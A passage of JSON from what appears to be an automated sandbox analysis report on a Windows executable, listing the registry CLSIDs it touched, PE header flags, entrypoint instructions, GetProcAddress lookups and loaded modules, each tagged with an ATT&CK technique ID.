"type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" touched \"WbemAdministrativeLocator Class\" (Path: \"HKCU\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" touched \"Microsoft WBEM Call Context\" (Path: \"HKCU\\CLSID\\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\TREATAS\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" touched \"Microsoft WBEM WbemClassObject Marshalling proxy\" (Path: \"HKCU\\CLSID\\{4590F812-1D3A-11D0-891F-00AA004B2E24}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" file has an entrypoint instructions - \"nop\t,nop\tword ptr [eax + eax],call\t0x419000,nop\tdword ptr [eax],call\t0x40639c,nop\t,call\t0x409990,nop\tdword ptr [eax],call\t0x417458,nop\tword ptr [eax + eax],push\t0,call\tdword ptr [0x4255c8],nop\tword ptr [eax + eax],call\t0x418dd6,call\t0x418dca,call\t0x418dbe,call\t0x418dd0,call\t0x418dbe,call\t0x418dbe,call\t0x418dc4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetDefaultPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetDefaultPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverPackagePathW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter CorePrinterDriverInstalledW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetCorePrinterDriversW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter UploadPrinterDriverPackageW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter InstallPrinterDriverFromPackageW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPrinterConnection2W (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter OpenPrinter2W (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterKeyW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDataExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPrinterKeyW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDataExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetPrinterDataExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetPrinterDataExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDataW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDataW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SpoolerPrinterEvent (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetPortW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DocumentPropertySheets (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DevicePropertySheets (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter IsValidDevmodeW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter IsValidDevmodeA (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPortExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrintProvidorW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPrintProvidorW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrintProcessorW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeleteMonitorW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddMonitorW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter StartDocDlgW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AdvancedDocumentPropertiesW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AdvancedDocumentPropertiesA (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DocumentPropertiesW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeviceCapabilitiesW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterIC (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter PlayGdiScriptOnPrinterIC (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter CreatePrinterIC (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetJobW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetJobW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumJobsW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverDirectoryW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPrintersW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPrinterConnectionW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterConnectionW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPrinterDriverExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPrinterDriverExA (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDriversW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPrintProcessorW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPrintProcessorsW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetPrintProcessorDirectoryW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPrintProcessorDatatypesW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SplDriverUnloadComplete (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter OpenPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter OpenPrinterA (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter ResetPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter StartDocPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter FlushPrinter (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetPrinterDataW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetPrinterDataW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddJobW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter ScheduleJob (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter WaitForPrinterChange (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter FindNextPrinterChangeNotification (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter PrinterMessageBoxW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter ClosePrinter (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddFormW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeleteFormW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetFormW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetFormW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumFormsW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumPortsW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EnumMonitorsW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter AddPortW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter ConfigurePortW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePortW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetPrinterW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverPackageW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetProcAddress\" with a parameter EtwUnregisterTraceGuids (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"NTDLL\" at base 76f30000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"USERENV.DLL\" at base 74f30000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"USER32.DLL\" at base 75410000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"GDI32.DLL\" at base 75830000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"SHELL32.DLL\" at base 75890000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"OLE32.DLL\" at base 769e0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"SHLWAPI.DLL\" at base 77080000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"OLEAUT32.DLL\" at base 754e0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"WTSAPI32.DLL\" at base 73320000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"RSTRTMGR.DLL\" at base 6b730000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"NETAPI32.DLL\" at base 73510000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"WKSCLI\" at base 734d0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"SRVCLI\" at base 74a30000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"SAMCLI\" at base 72d80000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"NETUTILS\" at base 738c0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"LOGONCLI\" at base 74690000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"ACTIVEDS.DLL\" at base 69db0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74f60000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"WININET.DLL\" at base 75580000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"WSOCK32.DLL\" at base 703b0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"WS2_32\" at base 76540000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"MPR.DLL\" at base 714e0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"WINSPOOL.DRV\" at base 70e70000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"GPEDIT.DLL\" at base 69c80000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"CRYPTBASE.DLL\" at base 74d30000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"ADVAPI32.DLL\" at base 76630000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"RPCRT4.DLL\" at base 76bb0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"NETUTILS.DLL\" at base 738c0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73ab0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"CLBCATQ.DLL\" at base 770e0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76830000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6d470000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6d5c0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76b60000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"CRYPTSP.DLL\" at base 74840000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 745d0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"KERNEL32.DLL\" at base 76830000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74dd0000\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6cb70000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"07000800bcfd1300@ntdll.dll\"\n \"09000a00bcfd1300@ntdll.dll\"\n \"08000900bcfd1300@ntdll.dll\"\n \"15001600bcfd1300@wkscli.dll\"\n \"0c000d00bcfd1300@srvcli.dll\"\n \"0b000c00bcfd1300@SAMCLI.DLL\"\n \"0e000f00bcfd1300@SAMCLI.DLL\"\n \"10001100bcfd1300@netutils.dll\"\n \"0c000d00bcfd1300@LOGONCLI.DLL\"\n \"0d000e00bcfd1300@LOGONCLI.DLL\"\n \"15001600c03ee769@ADVAPI32.dll\"\n \"0e000f00703fe769@ADVAPI32.dll\"\n \"0e000f00cc3fe769@ADVAPI32.dll\"\n 